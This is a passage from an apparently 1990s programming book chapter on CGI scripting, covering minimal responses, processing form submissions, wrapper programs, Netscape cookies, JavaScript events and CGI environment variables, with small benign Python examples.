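#   ctype = choose_type(os.environ.get("HTTP_ACCEPT", "*/*"))
#   print(f"Content-type: {ctype}\n")
```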

It is up to you as a programmer to ensure that your output conforms to the specifications for a particular type. If it does not, the correct results will not be displayed and the users will be annoyed.

The Minimal Response

At a minimum, your CGI script needs to send the content type back to the Web browser and should send something meaningful back (after all, that is why a CGI script is executed--to do something).
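A minimal response, sketched as a Python CGI script: the Content-type header, the required blank line, and a small HTML page. The page text is made up; the timestamp is there only so that each run visibly produces something new. Where the file goes, and whether it must be marked executable (for example, with chmod 755), depends on your server, as described below.

```python
#!/usr/bin/env python3
"""A minimal CGI script: a header, a blank line, then an HTML body."""
import datetime


def minimal_response(now=None):
    now = now or datetime.datetime.now()
    body = ("<html><head><title>Hello</title></head>\n"
            "<body><p>This page was generated at "
            f"{now:%Y-%m-%d %H:%M:%S}.</p></body></html>\n")
    # Header line, then the required blank line, then the document.
    return "Content-type: text/html\n\n" + body


if __name__ == "__main__":
    print(minimal_response(), end="")
```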

As previously mentioned, the URL used for CGI scripts might be different depending on the server software used. Some look for the files in one location while others require different locations.

You should talk to your local administrator or ISP for more information on exactly how to code your URLs and where to place your files when using CGI scripts. The ISP I use requires that CGI scripts go in the cgi-bin subdirectory under public_html. When referencing the scripts in a URL, only the cgi-bin directory is mentioned; public_html is left out.

The technique of generating HTML code in a CGI script is referred to as "Dynamic HTML" because the output can change depending on the results of the script being executed. HTML in a regular file (the "normal" way of doing things) does not change unless you replace the file, so it is static. A CGI script can show each user something different, so its output is dynamic.
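As an illustration, the following Python sketch builds a page that differs with each request. It greets the visitor by REMOTE_HOST (or REMOTE_ADDR) and shows the server's clock. The function name `dynamic_page` is hypothetical. The sketch assumes the server sets these variables as described in Table 17.1.

```python
import html
import os
import time


def dynamic_page(environ, now=None):
    """Return a CGI response whose body depends on who asked and when."""
    visitor = environ.get("REMOTE_HOST") or environ.get("REMOTE_ADDR") or "unknown host"
    stamp = time.strftime("%H:%M:%S", time.localtime(now))  # now=None means "current time"
    return (
        "Content-type: text/html\n\n"
        "<HTML><BODY>\n"
        # html.escape keeps odd characters in the variable from being read as markup
        f"<P>Hello, visitor from {html.escape(visitor)}.</P>\n"
        f"<P>The server's clock reads {stamp}.</P>\n"
        "</BODY></HTML>\n"
    )


if __name__ == "__main__":
    print(dynamic_page(os.environ), end="")
```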

Forms

One of the more common uses for CGI scripts is processing the data received from HTML forms. The form's METHOD attribute is coded as POST, and its ACTION attribute is the URL of your script. The user enters data into the form through his Web browser, and when he clicks the submit button, the browser sends the data to the server, which executes your script.
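With POST, the server passes the form data to the script on standard input. CONTENT_LENGTH gives its size in bytes, and the data is encoded as application/x-www-form-urlencoded. The following Python sketch decodes it with the standard `urllib.parse.parse_qs` function. The function name `read_form` is hypothetical. The sketch does not handle file-upload (multipart/form-data) forms.

```python
import os
import sys
from urllib.parse import parse_qs


def read_form(environ, stream=None):
    """Return the submitted form fields as a dict mapping name -> list of values.

    Assumes the default application/x-www-form-urlencoded encoding.
    """
    if environ.get("REQUEST_METHOD", "GET").upper() == "POST":
        if stream is None:
            stream = sys.stdin.buffer  # the server pipes the POSTed data to stdin
        length = int(environ.get("CONTENT_LENGTH") or 0)
        # Read exactly CONTENT_LENGTH bytes; the server need not signal end-of-file.
        raw = stream.read(length).decode("ascii", errors="replace")
    else:
        # A GET form puts the same encoded data after the "?" in the URL.
        raw = environ.get("QUERY_STRING", "")
    # parse_qs turns "+" into spaces and decodes %XX escapes; values are lists
    # because a field such as a multi-select list can appear more than once.
    return parse_qs(raw, keep_blank_values=True)


if __name__ == "__main__":
    fields = read_form(os.environ)
    print("Content-type: text/plain\n")
    for name, values in sorted(fields.items()):
        print(f"{name} = {', '.join(values)}")
```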

There are a number of ways to deal with the data received from the form. You can save it to a file, you can mail it to someone or a mail-enabled application, or you can perform more complex processing. You might enter someone in a database, send her a confirmation e-mail, and then add her to an e-mail mailing list. Or you could just save the data (signing a Web page guest book or filling out a comments form are common examples).
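Saving submissions to a shared file raises a locking question, because two people may submit the form at the same moment. The following is a minimal Python sketch of a guest book that appends one line per entry while holding an exclusive lock. It assumes a UNIX host, because the `fcntl` module is UNIX-only. The function name and the file path you pass to it are hypothetical.

```python
import fcntl
import time


def sign_guestbook(path, name, comment):
    """Append one entry to a guest-book file while holding an exclusive lock.

    fcntl.flock is advisory: it only protects against other programs that
    also call flock on the same file.
    """
    # Collapse whitespace so a stray newline cannot forge an extra entry.
    name = " ".join(name.split())
    comment = " ".join(comment.split())
    with open(path, "a", encoding="utf-8") as book:
        fcntl.flock(book, fcntl.LOCK_EX)  # wait until no one else is writing
        try:
            book.write(f"{time.strftime('%Y-%m-%d %H:%M')}\t{name}\t{comment}\n")
            book.flush()  # push the data out before releasing the lock
        finally:
            fcntl.flock(book, fcntl.LOCK_UN)
```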

Sending the data as e-mail to a user is the simplest method because you do not have to deal with file or record locking issues. E-mail is especially useful if your ISP or system administrator will not let you execute binaries on the system; if you can execute binaries, you can use a program to access a database instead.
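Here is a sketch of the e-mail approach in Python. It assumes the host runs a sendmail-compatible program at `/usr/sbin/sendmail`; the location varies by system. The `-t` flag tells sendmail to take recipients from the message headers, and `-oi` keeps a line containing a single dot from ending the message early. The function names and addresses are hypothetical.

```python
import subprocess
from email.message import EmailMessage

SENDMAIL = "/usr/sbin/sendmail"  # assumption: check the path on your system


def build_form_mail(form, to_addr, from_addr):
    """Turn a dict of single-valued form fields into an e-mail message.

    Form values go only into the body, never into headers, so a user
    cannot add recipients by typing them into a field.
    """
    msg = EmailMessage()
    msg["To"] = to_addr
    msg["From"] = from_addr
    msg["Subject"] = "Web form submission"
    lines = [f"{name}: {value}" for name, value in sorted(form.items())]
    msg.set_content("\n".join(lines) + "\n")
    return msg


def send_form_mail(msg):
    """Hand the message to the local mail system; -t reads recipients from headers."""
    subprocess.run([SENDMAIL, "-t", "-oi"], input=msg.as_bytes(), check=True)
```

The recipient address is fixed in the script rather than taken from the form. This keeps the script from being used to send mail to arbitrary addresses.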

Make sure you provide users with feedback. It is important that they know the contents of the form have been submitted and accepted. If there is some kind of error, let them know that too. You should validate the data in your CGI script; you can also check it in the browser, before it is submitted, using something like JavaScript.
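The following Python sketch shows server-side validation combined with feedback. Validation in the script is the check you can rely on, because browser-side checks can be bypassed. The field names `name` and `email` and the simple e-mail pattern are hypothetical rules for a comments form. The sketch assumes each field holds a single string value.

```python
import html
import re

# Hypothetical rule: something@something.something, with no spaces.
EMAIL_PATTERN = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def validate(form):
    """Return a list of error messages; an empty list means the data is acceptable."""
    errors = []
    name = form.get("name", "").strip()
    email = form.get("email", "").strip()
    if not name:
        errors.append("Please enter your name.")
    if not EMAIL_PATTERN.match(email):
        errors.append("Please enter an e-mail address such as joe@myhouse.com.")
    return errors


def feedback_page(errors):
    """Tell the user whether the submission was accepted, and if not, why not."""
    if errors:
        items = "".join(f"<LI>{html.escape(e)}</LI>" for e in errors)
        body = f"<P>Your form was not accepted:</P><UL>{items}</UL>"
    else:
        body = "<P>Thank you. Your form has been submitted and accepted.</P>"
    return "Content-type: text/html\n\n<HTML><BODY>" + body + "</BODY></HTML>\n"
```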

CGI-BIN Wrappers

Some Internet Service Providers will not allow you to execute your CGI scripts directly; mine enforces this restriction. I have to execute a program that then executes my script. This is known as wrappering or wrapping: my code is run by other code.

There are a number of reasons for this. The wrapper can limit the amount of CPU time, I/O, and other resources my script is able to use (preventing runaway or system-hogging scripts). It can also provide additional security and do some of the setup for me by resolving environment variables. Another important feature is the ability to run the wrapper in debugging mode, in which it shows all the environment variables that were passed to my script. That makes debugging much easier.
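If your server has no wrapper with a debugging mode, a small script can give a similar view. The Python sketch below is a do-it-yourself stand-in, not the wrapper's actual output format. It lists every environment variable the script receives. Don't leave such a script installed on a public server, because it reveals details about your setup.

```python
import html
import os


def environment_report(environ):
    """Return an HTML page listing every CGI environment variable, sorted by name."""
    rows = "\n".join(
        f"<TR><TD>{html.escape(k)}</TD><TD>{html.escape(v)}</TD></TR>"
        for k, v in sorted(environ.items())
    )
    return ("Content-type: text/html\n\n"
            "<HTML><BODY><TABLE BORDER=1>\n" + rows + "\n</TABLE></BODY></HTML>\n")


if __name__ == "__main__":
    print(environment_report(os.environ), end="")
```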

The only downside I have seen so far with the wrapper is that the URL was a little confusing until I got used to it. Instead of coding:

<a href="/~joeuser/cgi-bin/test.ksh">Link Text</a>

I code:

<a href="/cgi-bin/cgiwrap/joeuser/test.ksh">Link Text</a>

Netscape Cookies

Cookies are another way to maintain state information. A cookie is simply a bit of data, containing one or more name/value pairs, that is passed between the client and the server in the HTTP header rather than in the query string. In addition to the name/value pairs, a cookie can carry a number of optional attributes.

Be aware that the cookie specification is still preliminary. You might find that things suddenly don't behave quite the way you'd expect when someone is using a different version of a cookie-supporting browser. The official specification is kept at

http://home.netscape.com/newsref/std/cookie_spec.html.

expiration time
You can define a cookie's lifespan by using this attribute. Its value is a special date/time string (in GMT) that specifies when the cookie expires. Until that time is reached, the client will continue to give the cookie to the server with each request made, even if the user restarts his client. If the date isn't provided, the cookie remains active only as long as the client is running; as soon as the client exits, the cookie is lost.
domain
This defines the domain name for which the cookie is valid. A domain in one of the "big seven" top-level Internet domains (COM, EDU, NET, ORG, GOV, MIL, and INT) must contain at least two dots; other domains require at least three. Hence, if you specify .myhouse.com as the domain for the cookie, the cookie will be passed to www.myhouse.com, www.lab.myhouse.com, and frontdoor.myhouse.com, but not to any host outside the .myhouse.com domain. If this attribute isn't specified, the cookie is valid only at the host that issued it. Either way, your program can't get cookies that have been given to the client by someone else, and vice versa.
path
Not only can you limit cookies by domain or to a specific host, but you can specify which path hierarchies a cookie is valid for, as well. For example, if you set this attribute to be /cgi-bin/mystuff, then any program running underneath /cgi-bin/mystuff will be able to use the cookie, such as /cgi-bin/mystuff/game.pl and /cgi-bin/mystuff/runme.pl. However, /cgi-bin/send-me-money.pl would not be able to use your cookie, even though it's on the same server.
"secure" flag
If this flag is set, the client will send the cookie back to the server only over a secure channel, such as SSL.
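The server hands the browser's cookies to a CGI script in the HTTP_COOKIE environment variable. The script sends new ones with a Set-Cookie header line, printed along with Content-type and before the blank line that ends the headers. The following Python sketch uses the standard `http.cookies` module. The function names and the visit counter are illustrative assumptions, and the path /cgi-bin/mystuff is borrowed from the path example above.

```python
import os
import time
from email.utils import formatdate
from http.cookies import SimpleCookie


def read_cookies(environ):
    """Return the browser's cookies (passed to the script in HTTP_COOKIE) as a dict."""
    jar = SimpleCookie()
    jar.load(environ.get("HTTP_COOKIE", ""))
    return {name: morsel.value for name, morsel in jar.items()}


def make_cookie_header(name, value, lifetime_seconds=None, domain=None,
                       path=None, secure=False):
    """Build one Set-Cookie header line carrying the optional attributes."""
    jar = SimpleCookie()
    jar[name] = value
    morsel = jar[name]
    if lifetime_seconds is not None:
        # expires is a GMT date string; without it the cookie dies with the client.
        morsel["expires"] = formatdate(time.time() + lifetime_seconds, usegmt=True)
    if domain:
        morsel["domain"] = domain
    if path:
        morsel["path"] = path
    if secure:
        morsel["secure"] = True
    return jar.output()  # e.g. "Set-Cookie: name=value; Domain=...; Path=..."


if __name__ == "__main__":
    # Count this browser's visits; never trust the old value to be a number.
    old = read_cookies(os.environ).get("visits", "0")
    visits = (int(old) if old.isdigit() else 0) + 1
    print(make_cookie_header("visits", str(visits), lifetime_seconds=30 * 24 * 3600,
                             path="/cgi-bin/mystuff"))
    print("Content-type: text/plain\n")
    print(f"You have visited this page {visits} time(s).")
```

The cookie's value comes back from the client, so the sketch treats it like any other user input and checks it before use.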

JavaScript

JavaScript is a useful interpreted language that runs inside the browser. It was introduced in Netscape Navigator version 2 as "LiveScript," but its name was almost immediately changed to JavaScript, and it was made to look similar to Java. Having code execute on the client side is nice, especially for CGI purposes, because you can do things like form validation on the client. This shifts the load of user-interface tasks onto the client (where it belongs) and off your server (where it doesn't).

Each JavaScript event applies only to certain kinds of elements. The following list describes the JavaScript events and the elements each one applies to.

onBlur
The user has moved the focus away from this field (for example, by clicking in another area). Applicable for

* Text fields

* Text areas

* Password fields

* File fields

* Pop-up menus

* Scrolling lists

onChange
The user has changed the contents of the field. Applicable for

* Text fields

* Text areas

* Password fields

* File fields

* Pop-up menus

* Scrolling lists

onClick
The mouse has been clicked. Applicable for

* Buttons (including submit, reset, and image buttons)

* Checkboxes

* Radio buttons

onFocus
The user has moved the focus to this field. Applicable for

* Text fields

* Text areas

* Password fields

* File fields

* Pop-up menus

* Scrolling lists

onLoad
The browser has finished loading the current document. Applicable for

* The HTML <BODY> section only.

onSelect
The user has selected some of the text in the field. Applicable for

* Text fields

* Text areas

* Password fields

* File fields

onSubmit
The user has pressed the submit button of a form. The JavaScript is executed before the form is actually submitted, so the handler can return false to cancel the submission. Applicable for

* Forms

onUnload
The browser is closing the current page or frame. Applicable for

* The HTML <BODY> section only.

Reference to CGI Resources

There are many resources available on the Internet and in printed books. The following are some starting points:

CGI Scripting Overview

http://hoohoo.ncsa.uiuc.edu/cgi/overview.html

Yahoo's CGI links

http://www.yahoo.com/Computers_and_Internet/Internet/World_Wide_Web/CGI_Common_Gateway_Interface/

Using HTML 3.2, Java 1.1, and CGI, Eric Ladd and Jim O'Donnell, Que Corporation, 1996, ISBN 0-7897-0932-5.

Summary

The Common Gateway Interface (CGI) provides a powerful and flexible way to extend Web page functionality.

Client-side CGI is programmed using HTML tags, resulting in forms that capture user input and transmit it to server-side applications. The server side of CGI passes this information to application programs that return updated Web pages and other information to the client system.

There are three general categories of tools for developing CGI programs:

* UNIX shell scripts (such as Korn and C shell scripts)

* Advanced scripting languages (such as Perl)

* Compiled languages (such as C and C++)

Each of these tools has its own advantages and disadvantages; each does some things better and some things worse than the others. The next three chapters provide information on developing CGI with tools from each of these categories.

Variable	Description
`AUTH_TYPE`	User authentication type (if used)
`CONTENT_LENGTH`	Size of the attached data in bytes
`CONTENT_TYPE`	Content type of the attached data (used with `PUT` and `POST`)
`GATEWAY_INTERFACE`	CGI specification version supported by the server
`HTTP_ACCEPT`	MIME types the client browser will accept, in comma-delimited form: type/subtype, type2/subtype
`HTTP_CONNECTION`	Connection type ("Keep-Alive", for example)
`HTTP_HOST`	DNS name of the server; may be an alias
`HTTP_REFERER`	URL of the page containing the link to this CGI script
`HTTP_USER_AGENT`	Software name/version of the client browser
`PATH_INFO`	Extra path information following the script name in the URL
`PATH_TRANSLATED`	`PATH_INFO` translated from a logical path into a physical file-system path
`QUERY_STRING`	Arguments placed after the `?` in the URL
`REMOTE_ADDR`	IP address of the remote host
`REMOTE_HOST`	Name of the remote host (via DNS), or its IP address if no DNS name is available
`REMOTE_IDENT`	User ID (if IDENT, RFC 931, is supported)
`REMOTE_USER`	Authenticated user ID (if used/supported)
`REQUEST_METHOD`	Request method (for example, `GET` or `POST`)
`SCRIPT_NAME`	Logical path and name of the script
`SERVER_NAME`	Server name (DNS alias, actual name, or IP address)
`SERVER_PORT`	Port used to answer the request
`SERVER_PROTOCOL`	Name/version of the protocol used
`SERVER_SOFTWARE`	Name/version of the Web server software



What Is the Common Gateway Interface?

What CGI Is Not

SSI (Making dynamic pages without CGI)

Server APIs vs. CGI

How CGI Works

Basic Forms: Tags and Attributes

FORM

INPUT

Listing 17.1. Field definitions for a form.

Advanced Forms

SELECT and OPTION

Listing 17.2. Defining SELECT lists.

TEXTAREA

Listing 17.3. Defining a free-form TEXTAREA.

Server-Side Includes

Design Considerations

Using CGI

How To Execute CGI

Security Issues

Data Available to the Shell Script

Table 17.1. Environmental variables.

Output Types

Table 17.2. Common content types.

The Minimal Response

Forms

CGI-BIN Wrappers

Netscape Cookies

JavaScript

Reference to CGI Resources

Summary
